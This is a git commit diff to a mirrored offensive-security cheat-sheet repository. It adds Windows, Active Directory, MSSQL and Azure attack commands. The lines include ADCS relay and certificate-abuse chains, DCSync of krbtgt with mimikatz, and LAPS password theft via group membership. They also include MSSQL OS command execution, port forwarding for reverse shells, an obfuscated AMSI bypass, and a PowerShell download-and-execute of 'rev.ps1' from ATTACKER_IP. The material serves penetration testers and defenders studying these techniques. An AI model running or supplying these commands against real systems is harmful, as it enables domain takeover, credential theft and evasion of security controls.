mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
LAPS Access + Pass the Cert + Writeable folder
This commit is contained in:
parent
51aeb90623
commit
3066615cde
@ -82,6 +82,7 @@
|
|||||||
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||||
|
- [Pass-The-Certificate](#pass-the-certificate)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [GenericAll](#genericall)
|
- [GenericAll](#genericall)
|
||||||
@ -230,13 +231,13 @@ Use the correct collector
|
|||||||
# run the collector on the machine using SharpHound.exe
|
# run the collector on the machine using SharpHound.exe
|
||||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
||||||
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
|
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
|
||||||
.\SharpHound.exe -c all -d active.htb -SearchForest
|
.\SharpHound.exe -c all -d active.htb --searchforest
|
||||||
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
|
.\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
|
||||||
.\SharpHound.exe -c all,GPOLocalGroup
|
.\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
|
||||||
|
|
||||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||||
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
|
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
|
||||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
||||||
.\SharpHound.exe -c all,GPOLocalGroup --searchforest
|
|
||||||
|
|
||||||
# or run the collector on the machine using Powershell
|
# or run the collector on the machine using Powershell
|
||||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
||||||
@ -1467,6 +1468,14 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
|
|||||||
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
|
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Grant LAPS Access
|
||||||
|
The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
|
||||||
|
Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Reading GMSA Password
|
### Reading GMSA Password
|
||||||
|
|
||||||
@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local
|
|||||||
|
|
||||||
### Active Directory Certificate Services
|
### Active Directory Certificate Services
|
||||||
|
|
||||||
* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
* Find ADCS Server
|
||||||
|
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
||||||
|
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
|
||||||
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
|
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
|
||||||
|
|
||||||
#### ESC1 - Misconfigured Certificate Templates
|
#### ESC1 - Misconfigured Certificate Templates
|
||||||
@ -2247,8 +2258,10 @@ Exploitation:
|
|||||||
```ps1
|
```ps1
|
||||||
Certify.exe find /vulnerable
|
Certify.exe find /vulnerable
|
||||||
Certify.exe find /vulnerable /currentuser
|
Certify.exe find /vulnerable /currentuser
|
||||||
or
|
# or
|
||||||
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
||||||
|
# or
|
||||||
|
certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
|
||||||
```
|
```
|
||||||
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
||||||
```ps1
|
```ps1
|
||||||
@ -2394,7 +2407,7 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
|
|||||||
|
|
||||||
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
||||||
|
|
||||||
* Version 1: NTLM Relay + Rubeus + PetitPotam
|
* **Version 1**: NTLM Relay + Rubeus + PetitPotam
|
||||||
```powershell
|
```powershell
|
||||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
||||||
@ -2417,7 +2430,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
mimikatz> lsadump::dcsync /user:krbtgt
|
mimikatz> lsadump::dcsync /user:krbtgt
|
||||||
```
|
```
|
||||||
|
|
||||||
* Version 2: NTLM Relay + Mimikatz + Kekeo
|
* **Version 2**: NTLM Relay + Mimikatz + Kekeo
|
||||||
```powershell
|
```powershell
|
||||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||||
|
|
||||||
@ -2431,7 +2444,17 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
# Mimikatz
|
# Mimikatz
|
||||||
mimikatz> lsadump::dcsync /user:krbtgt
|
mimikatz> lsadump::dcsync /user:krbtgt
|
||||||
```
|
```
|
||||||
* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
|
|
||||||
|
* **Version 3**: Kerberos Relay
|
||||||
|
```ps1
|
||||||
|
# Setup the relay
|
||||||
|
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
|
||||||
|
|
||||||
|
# Run mitm6
|
||||||
|
sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
|
||||||
```powershell
|
```powershell
|
||||||
https://github.com/bats3c/ADCSPwn
|
https://github.com/bats3c/ADCSPwn
|
||||||
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
||||||
@ -2451,7 +2474,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||||
output - Output path to store base64 generated crt.
|
output - Output path to store base64 generated crt.
|
||||||
```
|
```
|
||||||
* Version 4: Certipy ESC8
|
|
||||||
|
* **Version 5**: Certipy ESC8
|
||||||
```ps1
|
```ps1
|
||||||
certipy relay -ca 172.16.19.100
|
certipy relay -ca 172.16.19.100
|
||||||
```
|
```
|
||||||
@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
#### Pass-The-Certificate
|
||||||
|
|
||||||
|
* Windows
|
||||||
|
```ps1
|
||||||
|
# Information about a cert file
|
||||||
|
certutil -v -dump admin.pfx
|
||||||
|
|
||||||
|
# From a Base64 PFX
|
||||||
|
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||||
|
```
|
||||||
|
* Linux
|
||||||
|
```ps1
|
||||||
|
# Base64-encoded PFX certificate (string) (password can be set)
|
||||||
|
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
|
||||||
|
# PEM certificate (file) + PEM private key (file)
|
||||||
|
gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
|
||||||
|
# PFX certificate (file) + password (string, optionnal)
|
||||||
|
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
|
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
|
||||||
@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
|
|||||||
([adsisearcher]"(AdminCount=1)").findall()
|
([adsisearcher]"(AdminCount=1)").findall()
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
#### AdminSDHolder Abuse
|
#### AdminSDHolder Abuse
|
||||||
|
|
||||||
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
|
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
|
||||||
|
@ -3,6 +3,7 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Azure Recon Tools](#azure-recon-tools)
|
* [Azure Recon Tools](#azure-recon-tools)
|
||||||
|
* [Terminology](#terminology)
|
||||||
* [Enumeration](#enumeration)
|
* [Enumeration](#enumeration)
|
||||||
* [Enumerate valid emails](#enumerate-valid-emails)
|
* [Enumerate valid emails](#enumerate-valid-emails)
|
||||||
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
|
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
|
||||||
@ -180,6 +181,16 @@
|
|||||||
$ Create-Backdoor, Execute-Backdoor
|
$ Create-Backdoor, Execute-Backdoor
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Terminology
|
||||||
|
|
||||||
|
> Basic Azure AD terminologies
|
||||||
|
|
||||||
|
* **Tenant**: An instance of Azure AD and represents a single organization.
|
||||||
|
* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.
|
||||||
|
* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory.
|
||||||
|
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
|
||||||
|
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
|
||||||
### Enumerate valid emails
|
### Enumerate valid emails
|
||||||
@ -1116,3 +1127,4 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
|
|||||||
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
||||||
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
||||||
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
||||||
|
* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
|
@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test"
|
|||||||
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
|
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
|
||||||
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
||||||
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
|
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
|
||||||
|
* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
|
@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
|
|||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
|
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
|
||||||
|
select * from master..sysservers
|
||||||
```
|
```
|
||||||
|
|
||||||
### Crawl Links for a Specific Instance
|
### Crawl Links for a Specific Instance
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||||
|
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
|
||||||
```
|
```
|
||||||
|
|
||||||
### Query Version of Linked Database
|
### Query Version of Linked Database
|
||||||
@ -286,12 +288,21 @@ Prerequisites:
|
|||||||
* CREATE ASSEMBLY permission (or)
|
* CREATE ASSEMBLY permission (or)
|
||||||
* ALTER ASSEMBLY permission (or)
|
* ALTER ASSEMBLY permission (or)
|
||||||
|
|
||||||
|
The execution takes place with privileges of the **service account**.
|
||||||
|
|
||||||
### Execute commands using CLR assembly
|
### Execute commands using CLR assembly
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
|
||||||
|
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
|
||||||
|
|
||||||
|
# Execute command using CLR assembly
|
||||||
|
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
|
||||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||||
or
|
|
||||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
|
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
|
||||||
|
|
||||||
|
# List all the stored procedures added using CLR
|
||||||
|
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
### Manually creating a CLR DLL and importing it
|
### Manually creating a CLR DLL and importing it
|
||||||
@ -385,6 +396,7 @@ GO
|
|||||||
## OLE Automation
|
## OLE Automation
|
||||||
|
|
||||||
* :warning: Disabled by default
|
* :warning: Disabled by default
|
||||||
|
* The execution takes place with privileges of the **service account**.
|
||||||
|
|
||||||
### Execute commands using OLE automation procedures
|
### Execute commands using OLE automation procedures
|
||||||
|
|
||||||
@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
|
|||||||
|
|
||||||
## Agent Jobs
|
## Agent Jobs
|
||||||
|
|
||||||
|
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
|
||||||
|
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
|
||||||
|
|
||||||
### Execute commands through SQL Agent Job service
|
### Execute commands through SQL Agent Job service
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
@ -461,12 +476,21 @@ RECONFIGURE;
|
|||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||||
|
|
||||||
|
EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
|
||||||
|
WITH RESULT SETS (([cmd_out] nvarchar(max)))
|
||||||
```
|
```
|
||||||
|
|
||||||
## R
|
## R
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||||
|
|
||||||
|
EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
|
||||||
|
WITH RESULT SETS (([cmd_out] text));
|
||||||
|
GO
|
||||||
|
|
||||||
|
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
|
||||||
```
|
```
|
||||||
|
|
||||||
## Audit Checks
|
## Audit Checks
|
||||||
@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS
|
|||||||
|
|
||||||
## Find databases that have been configured as trustworthy
|
## Find databases that have been configured as trustworthy
|
||||||
|
|
||||||
```ps1
|
```sql
|
||||||
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
||||||
|
|
||||||
|
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
|
||||||
```
|
```
|
||||||
|
|
||||||
> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
|
> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
|
||||||
|
@ -30,8 +30,17 @@
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
|
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
|
||||||
|
|
||||||
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
|
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
|
||||||
|
|
||||||
|
# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
|
||||||
|
netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
|
||||||
|
netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
|
||||||
|
# Correctly open the port on the machine
|
||||||
|
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
|
||||||
|
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
|
||||||
|
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
|
||||||
|
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
1. listenaddress – is a local IP address waiting for a connection.
|
1. listenaddress – is a local IP address waiting for a connection.
|
||||||
@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
|||||||
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
|
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
|
||||||
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
||||||
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
||||||
|
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
|
@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off
|
|||||||
### AppLocker Enumeration
|
### AppLocker Enumeration
|
||||||
|
|
||||||
- With the GPO
|
- With the GPO
|
||||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
|
||||||
|
|
||||||
|
|
||||||
* List AppLocker rules
|
* List AppLocker rules
|
||||||
```powershell
|
```powershell
|
||||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||||
```
|
```
|
||||||
|
|
||||||
* Applocker Bypass
|
* AppLocker Bypass
|
||||||
|
* By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
|
||||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
|
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
|
||||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
|
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
|
||||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
|
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
|
||||||
@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
|
|||||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||||
```
|
```
|
||||||
|
|
||||||
Powershell Constrained Mode
|
#### Powershell Constrained Mode
|
||||||
|
|
||||||
```powershell
|
* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
|
||||||
# Check if we are in a constrained mode
|
* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm)
|
||||||
$ExecutionContext.SessionState.LanguageMode
|
* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main`
|
||||||
|
* Other bypasses
|
||||||
|
```powershell
|
||||||
|
PS > &{ whoami }
|
||||||
|
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
||||||
|
```
|
||||||
|
|
||||||
PS > &{ whoami }
|
#### AMSI Bypass
|
||||||
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
|
||||||
|
|
||||||
# PowerShDLL - Powershell with no Powershell.exe via DLL’s
|
Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
|
||||||
# https://github.com/p3nt4/PowerShdll
|
|
||||||
ftp> rundll32.exe C:\temp\PowerShdll.dll,main
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Example of AMSI Bypass.
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||||
@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
|
|||||||
```powershell
|
```powershell
|
||||||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
